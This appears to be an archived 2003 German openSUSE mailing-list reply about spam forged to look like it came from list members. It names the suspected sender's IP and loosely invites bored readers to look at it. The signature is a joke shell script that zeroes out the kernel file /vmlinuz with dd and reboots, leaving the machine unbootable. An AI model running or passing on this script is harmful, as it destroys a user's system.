Mailinglist Archive: opensuse-de (4598 mails)

< Previous Next >
Re: Auf meine unbekannte Adresse aus Liste Spam
  • From: Daniel Lord <d_lord@xxxxxx>
  • Date: Wed, 9 Jul 2003 22:42:23 +0200
  • Message-id: <20030709204223.GA6605@xxxxxx>
Hi Al,

On Wed, Jul 09, 2003 at 10:40:48PM +0200, Al Bogner wrote:
> On Wednesday 09 July 2003 22:27, Kai Lindenberg wrote:
>
> > die habe ich auch bekommen, allerdings wurde eine andere
> > suse-linux Mail zitiert....
>
> Das 2. Mail hatte als Absender Matthias Houdek mit einer
> Arcor-Adresse.

genau das habe ich auch erhalten. Und der versendende PC war auch
der von Patrick Ofner. Ist aber schade das es nur 2 Varianten gibt
*g* Hat sich jemand nicht viel Mühe gegeben. Vor allem nicht beim
verbergen des Ursprungs. Wenn jemand langeweile hat. Die momentane
IP des fraglichen Rechners ist 62.218.237.20 der mich im übrigen
momentan scannt *lol*

Greetings Daniel

--
#!/bin/sh
echo 'Linux Must Die!' | wall
dd if=/dev/zero of=/vmlinuz bs=1 \
count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'`
shutdown -r now

< Previous Next >
Follow Ups